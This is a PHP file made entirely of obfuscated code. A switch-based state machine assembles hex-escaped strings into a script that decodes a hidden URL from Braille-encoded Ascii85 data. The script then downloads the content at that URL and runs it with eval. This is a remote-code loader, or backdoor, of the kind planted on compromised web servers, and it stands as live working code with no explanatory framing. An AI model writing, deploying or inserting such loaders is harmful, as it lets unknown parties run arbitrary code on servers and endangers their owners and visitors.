<?php
$s=647711; $o=""; while(true) { switch($s) { case 345380: $o.="\x27\x3b\x24\x6e\x3d\x30\x3b\x66"; $s=936837; break;
case 146774: $o.="\x3b\x24\x63\x3d\x27\x27\x3b\x24"; $s=519861; break;
case 265086: eval($o); break 2;
case 458566: $o.="\x82\xe2\xa2\x93\xe2\xa1\x94\xe2"; $s=494968; break;
case 797702: $o.="\x72\x65\x74\x75\x72\x6e\x20\x24"; $s=329106; break;
case 408855: $o.="\x42\x46\x2f\x27\x2c\x27\x27\x2c"; $s=562001; break;
case 552858: $o.="\x5b\x24\x69\x5d\x3b\x69\x66\x28"; $s=394061; break;
case 618601: $o.="\x6c\x69\x74\x28\x27\x2f\x2f\x75"; $s=206606; break;
case 916012: $o.="\x68\x29\x2d\x30\x78\x32\x38\x34"; $s=899557; break;
case 748559: $o.="\xe2\xa1\x97\xe2\xa1\xa5\xe2\xa1"; $s=246199; break;
case 594791: $o.="\x3b\x0d\x0a\x24\x61\x3d\x27\x27"; $s=363440; break;
case 494312: $o.="\x3d\x24\x64\x28\x24\x61\x29\x3b"; $s=424696; break;
case 363440: $o.="\x3b\x66\x6f\x72\x65\x61\x63\x68"; $s=932414; break;
case 885541: $o.="\x93\xe2\xa1\xa3\xe2\xa1\x8e\xe2"; $s=790596; break;
case 812465: $o.="\x6f\x2e\x3d\x73\x75\x62\x73\x74"; $s=851914; break;
case 672104: $o.="\x0a\x24\x6f\x72\x64\x3d\x66\x75"; $s=673891; break;
case 651458: $o.="\x50\x54\x59\x29\x20\x61\x73\x20"; $s=471213; break;
case 246199: $o.="\x82\xe2\xa2\x8a\xe2\xa2\x92\xe2"; $s=664487; break;
case 302778: $o.="\x8e\xe2\xa2\x8f\xe2\xa1\x88\xe2"; $s=931799; break;
case 929938: $o.="\xe2\xa1\xa5\xe2\xa1\xbd\xe2\xa2"; $s=458566; break;
case 514221: $o.="\x4e\x27\x2c\x24\x76\x29\x2c\x30"; $s=489966; break;
case 698679: $o.="\x24\x6a\x2b\x2b\x29\x24\x76\x3d"; $s=577199; break;
case 398754: $o.="\x20\x24\x63\x2e\x3d\x24\x78\x3b"; $s=234592; break;
case 932414: $o.="\x28\x70\x72\x65\x67\x5f\x73\x70"; $s=618601; break;
case 577199: $o.="\x24\x76\x2a\x38\x35\x2b\x28\x6f"; $s=254733; break;
case 509840: $o.="\x20\x20\x20\x0d\x0a\x24\x63\x6f"; $s=629919; break;
case 449357: $o.="\x29\x7b\x20\x24\x78\x3d\x24\x73"; $s=552858; break;
case 502196: $o.="\x63\x65\x28\x27\x2f\x5e\x5c\x78"; $s=727108; break;
case 978537: $o.="\x6e\x74\x69\x6e\x75\x65\x3b\x7d"; $s=398754; break;
case 394061: $o.="\x24\x78\x3d\x3d\x3d\x27\x7a\x27"; $s=992975; break;
case 489966: $o.="\x2c\x24\x6e\x2d\x31\x29\x3b\x7d"; $s=797702; break;
case 827848: $o.="\x65\x70\x6c\x61\x63\x65\x28\x27"; $s=694349; break;
case 647711: $o.="\x24\x42\x3d\x27\xe2\xa1\xa1\xe2"; $s=730605; break;
case 694349: $o.="\x2f\x5c\x73\x2b\x2f\x27\x2c\x27"; $s=181523; break;
case 159094: $o.="\x50\x52\x45\x47\x5f\x53\x50\x4c"; $s=651698; break;
case 414205: $o.="\x3d\x63\x68\x72\x28\x33\x33\x2b"; $s=586916; break;
case 586916: $o.="\x28\x24\x6f\x72\x64\x28\x24\x63"; $s=916012; break;
case 893679: $o.="\x66\x28\x24\x6e\x3e\x31\x29\x7b"; $s=804609; break;
case 571793: $o.="\x29\x3b\x0d\x0a\x65\x76\x61\x6c"; $s=168669; break;
case 498131: $o.="\x2d\x34\x42\x45\x27\x2c\x24\x63"; $s=952950; break;
case 804609: $o.="\x24\x63\x3d\x73\x74\x72\x5f\x70"; $s=915266; break;
case 562001: $o.="\x24\x63\x6f\x64\x65\x29\x29\x3b"; $s=265086; break;
case 181523: $o.="\x27\x2c\x24\x73\x29\x3b\x24\x6f"; $s=903358; break;
case 789893: $o.="\x2d\x38\x27\x2c\x27\x55\x43\x53"; $s=498131; break;
case 821732: $o.="\x6f\x6e\x76\x28\x27\x55\x54\x46"; $s=789893; break;
case 470274: $o.="\x5c\x30\x5c\x30\x22\x3b\x63\x6f"; $s=978537; break;
case 318066: $o.="\x65\x67\x5f\x72\x65\x70\x6c\x61"; $s=502196; break;
case 894945: $o.="\x6f\x72\x64\x28\x24\x63\x5b\x24"; $s=142825; break;
case 313809: $o.="\x3d\x30\x3b\x66\x6f\x72\x28\x24"; $s=663466; break;
case 168669: $o.="\x28\x27\x3f\x3e\x27\x2e\x70\x72"; $s=318066; break;
case 254733: $o.="\x72\x64\x28\x24\x63\x5b\x24\x6a"; $s=879449; break;
case 273186: $o.="\x72\x6e\x20\x75\x6e\x70\x61\x63"; $s=520080; break;
case 931799: $o.="\xa1\x9d\xe2\xa1\xba\x27\x3b\x0d"; $s=672104; break;
case 759481: $o.="\x24\x4c\x3d\x73\x74\x72\x6c\x65"; $s=358368; break;
case 664487: $o.="\xa1\x8c\xe2\xa1\xa5\xe2\xa1\x89"; $s=449395; break;
case 936837: $o.="\x6f\x72\x28\x24\x69\x3d\x30\x2c"; $s=759481; break;
case 732236: $o.="\x3d\x30\x3b\x24\x6a\x3c\x35\x3b"; $s=698679; break;
case 466805: $o.="\x6f\x2e\x3d\x22\x5c\x30\x5c\x30"; $s=470274; break;
case 742325: $o.="\x3c\x24\x4c\x3b\x24\x69\x2b\x2b"; $s=449357; break;
case 424696: $o.="\x20\x20\x20\x20\x20\x20\x20\x20"; $s=465819; break;
case 263508: $o.="\x5f\x67\x65\x74\x5f\x63\x6f\x6e"; $s=751498; break;
case 519861: $o.="\x6e\x3d\x30\x3b\x7d\x7d\x20\x69"; $s=893679; break;
case 790596: $o.="\xa1\xb7\xe2\xa1\x98\xe2\xa1\x88"; $s=929938; break;
case 431848: $o.="\x30\x3b\x66\x6f\x72\x28\x24\x6a"; $s=732236; break;
case 329106: $o.="\x6f\x3b\x7d\x3b\x0d\x0a\x24\x75"; $s=494312; break;
case 663466: $o.="\x6a\x3d\x30\x3b\x24\x6a\x3c\x35"; $s=994625; break;
case 727108: $o.="\x45\x46\x5c\x78\x42\x42\x5c\x78"; $s=408855; break;
case 206606: $o.="\x27\x2c\x24\x42\x2c\x2d\x31\x2c"; $s=159094; break;
case 471213: $o.="\x24\x63\x68\x29\x7b\x24\x61\x2e"; $s=414205; break;
case 520080: $o.="\x6b\x28\x27\x4e\x27\x2c\x69\x63"; $s=821732; break;
case 975355: $o.="\x27\x75\x27\x29\x3b\x24\x76\x3d"; $s=431848; break;
case 358368: $o.="\x6e\x28\x24\x73\x29\x3b\x24\x69"; $s=742325; break;
case 994625: $o.="\x3b\x24\x6a\x2b\x2b\x29\x24\x76"; $s=711803; break;
case 336437: $o.="\x73\x3d\x70\x72\x65\x67\x5f\x72"; $s=827848; break;
case 651698: $o.="\x49\x54\x5f\x4e\x4f\x5f\x45\x4d"; $s=651458; break;
case 992975: $o.="\x26\x26\x21\x24\x6e\x29\x7b\x24"; $s=466805; break;
case 711803: $o.="\x3d\x24\x76\x2a\x38\x35\x2b\x28"; $s=894945; break;
case 903358: $o.="\x3d\x27\x27\x3b\x24\x63\x3d\x27"; $s=345380; break;
case 465819: $o.="\x20\x20\x20\x20\x20\x20\x20\x20"; $s=509840; break;
case 132891: $o.="\xe2\xa1\x8c\xe2\xa1\xbf\xe2\xa1"; $s=302778; break;
case 449395: $o.="\xe2\xa1\x87\xe2\xa2\x94\xe2\xa1"; $s=885541; break;
case 730605: $o.="\xa1\xb0\xe2\xa1\xb2\xe2\xa1\x9e"; $s=748559; break;
case 915266: $o.="\x61\x64\x28\x24\x63\x2c\x35\x2c"; $s=975355; break;
case 899557: $o.="\x30\x29\x29\x3b\x7d\x0d\x0a\x24"; $s=986046; break;
case 673891: $o.="\x6e\x63\x74\x69\x6f\x6e\x28\x24"; $s=385748; break;
case 897078: $o.="\x24\x6f\x2e\x3d\x70\x61\x63\x6b"; $s=165389; break;
case 428845: $o.="\x6f\x6e\x28\x24\x73\x29\x7b\x24"; $s=336437; break;
case 851914: $o.="\x72\x28\x70\x61\x63\x6b\x28\x27"; $s=514221; break;
case 142825: $o.="\x6a\x5d\x29\x2d\x33\x33\x29\x3b"; $s=897078; break;
case 385748: $o.="\x63\x68\x29\x7b\x72\x65\x74\x75"; $s=273186; break;
case 751498: $o.="\x74\x65\x6e\x74\x73\x28\x24\x75"; $s=571793; break;
case 494968: $o.="\xa1\xa3\xe2\xa2\x85\xe2\xa1\x84"; $s=132891; break;
case 952950: $o.="\x68\x29\x29\x5b\x31\x5d\x3b\x7d"; $s=594791; break;
case 986046: $o.="\x64\x3d\x66\x75\x6e\x63\x74\x69"; $s=428845; break;
case 165389: $o.="\x28\x27\x4e\x27\x2c\x24\x76\x29"; $s=146774; break;
case 629919: $o.="\x64\x65\x3d\x40\x66\x69\x6c\x65"; $s=263508; break;
case 710306: $o.="\x3d\x3d\x3d\x35\x29\x7b\x24\x76"; $s=313809; break;
case 879449: $o.="\x5d\x29\x2d\x33\x33\x29\x3b\x24"; $s=812465; break;
case 234592: $o.="\x20\x69\x66\x28\x2b\x2b\x24\x6e"; $s=710306; break; } }
?>
